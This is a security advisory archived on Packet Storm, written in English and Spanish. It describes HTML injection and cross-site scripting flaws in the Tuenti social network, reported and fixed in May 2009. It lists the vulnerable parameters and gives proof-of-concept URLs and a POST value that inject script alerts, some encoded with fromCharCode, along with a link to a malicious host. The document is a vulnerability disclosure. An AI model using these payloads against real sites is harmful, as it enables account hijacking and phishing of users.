what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Tuenti Cross Site Scripting

Tuenti Cross Site Scripting
Posted May 15, 2009
Authored by YEnH4ckEr

Tuenti suffers from cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 4e8fe0c2d837defa39114a0594f6c599ae12850797cebb8f0e81ff82fe8287fc

Tuenti Cross Site Scripting

Change Mirror Download
####################
Language: English
####################

------------------------------------------------------------
MULTIPLE CODE INJECTION VULNERABILITIES --TUENTI--SPAIN-->
------------------------------------------------------------

SYSTEM INFORMATION:

-->WEB: http://www.tuenti.com/
-->DOWNLOAD: No there.
-->DEMO: N/A
-->CATEGORY: Social Networking
-->DESCRIPTION: Tuenti is the biggest and most popular social network in Spain.

SYSTEM VULNERABILITY:

-->TESTED ON: firefox 3 and Internet Explorer 6.0
-->CATEGORY: HTML CODE INJECTION / XSS
-->Discovered Bug date: 2009-05-04
-->Reported Bug date: 2009-05-04
-->Fixed bug date: 2009-05-12
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Xikitiya no me odies por esto jajaja


#################
/////////////////

HTML INJECTION:

/////////////////
#################


Go to --> http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos


Vuln GET var --> 'cat_id'


Note: Here was not possible a XSS attack


------------------
PROOF OF CONCEPT:
------------------


http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos"><A HREF=http://[MALICIOUS-HOST]/[PATH]/index.php>y3nh4ck3r was here!</A>


Return --> New link on footer


#############################
/////////////////////////////

CROSS SITE SCRIPTING (XSS):

/////////////////////////////
#############################


<<<<---------++++++++++++++ Condition: Be registered user +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Extra-Condition: Be friends (victim/attacker) +++++++++++++++++--------->>>>


Go to --> http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031


Vuln GET var --> 'items'


------------------
PROOF OF CONCEPT:
------------------


http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031"><script>alert('y3nh4ck3r was here')</script>


Return --> Alert message


<<<<---------++++++++++++++ Condition: Be registered user +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Extra-Condition: Nothing +++++++++++++++++--------->>>>


Go to --> http://www.tuenti.com/#m=videos&view=category&cat_id=upload


Vuln GET var --> 'cat_id'


------------------
PROOF OF CONCEPT:
------------------


http://www.tuenti.com/#m=videos&view=category&cat_id=upload"><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script>


Return --> Alert message


<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Extra-Condition: Nothing +++++++++++++++++--------->>>>


Go to --> http://www.tuenti.com/?need_invite=1


Vuln POST var --> 'email'


------------------
PROOF OF CONCEPT:
------------------


email="><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script>


Return --> Alert message


----------------
FINAL REMARK:
----------------


Staff's members have fixed successfully these vulnerabilites ;)


####################
Language: Spanish
####################

----------------------------------------------------------------------
MÚLTIPLES VULNERABILIDADES DE INYECCIÓN DE CÓDIGO --TUENTI--ESPAÑA->
----------------------------------------------------------------------

INFORMACIÓN DEL SISTEMA:

-->WEB: http://www.tuenti.com/
-->DESCARGA: No hay
-->DEMO: No disponible
-->CATEGORÍA: Red social
-->DESCRIPCIÓN: Tuenti es la mayor y más popular red social en España.

VULNERABILIDAD DEL SISTEMA:

-->PROBADO EN: firefox 3 y Internet Explorer 6.0
-->CATEGORÍA: INYECCIÓN DE CÓDIGO HTML/ XSS.
-->Fecha de descubrimiento del bug: 2009-05-04
-->Fecha de aviso al sistema: 2009-05-04
-->Fecha de fijación del bug: 2009-05-12
-->Autor: YEnH4ckEr
-->Correo: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: No disponible
-->Comentario: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->Comentario-extra: Xikitiya no me odies por esto jajaja


#################
/////////////////

INYECCIÓN HTML:

/////////////////
#################


Ir a --> http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos


Variable GET vulnerable --> 'cat_id'


Nota: Aquí no fue posible un ataque XSS


-------------------
PRUEBA DE CONCEPTO:
-------------------


http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos"><A HREF=http://[MALICIOUS-HOST]/[PATH]/index.php>y3nh4ck3r was here!</A>


Devuelve --> Nuevo enlace en el pie de página


#############################
/////////////////////////////

CROSS SITE SCRIPTING (XSS):

/////////////////////////////
#############################


<<<<---------++++++++++++++ Condición: Ser usuario registrado +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Condición-extra: Ser amigos (víctima/atacante) +++++++++++++++++--------->>>>


Ir a --> http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031


Variable GET vulnerable --> 'items'


-------------------
PRUEBA DE CONCEPTO:
-------------------


http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031"><script>alert('y3nh4ck3r was here')</script>


Devuelve --> Mensaje de alerta


<<<<---------++++++++++++++ Condición: Ser usuario registrado +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Condición-extra: Nada +++++++++++++++++--------->>>>


Ir a --> http://www.tuenti.com/#m=videos&view=category&cat_id=upload


Variable GET vulnerable --> 'cat_id'


-------------------
PRUEBA DE CONCEPTO:
-------------------


http://www.tuenti.com/#m=videos&view=category&cat_id=upload"><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script>


Devuelve --> Mensaje de alerta


<<<<---------++++++++++++++ Condición: Nada +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Condición-extra: Nada +++++++++++++++++--------->>>>


Ir a --> http://www.tuenti.com/?need_invite=1


Variable POST vulnerable --> 'email'


-------------------
PRUEBA DE CONCEPTO:
-------------------


email="><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script>


Devuelve --> Mensaje de alerta


-------------------
OBSERVACIÓN FINAL:
-------------------

El equipo de trabajo ha fijado con éxito estas vulnerabilidades ;)


#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close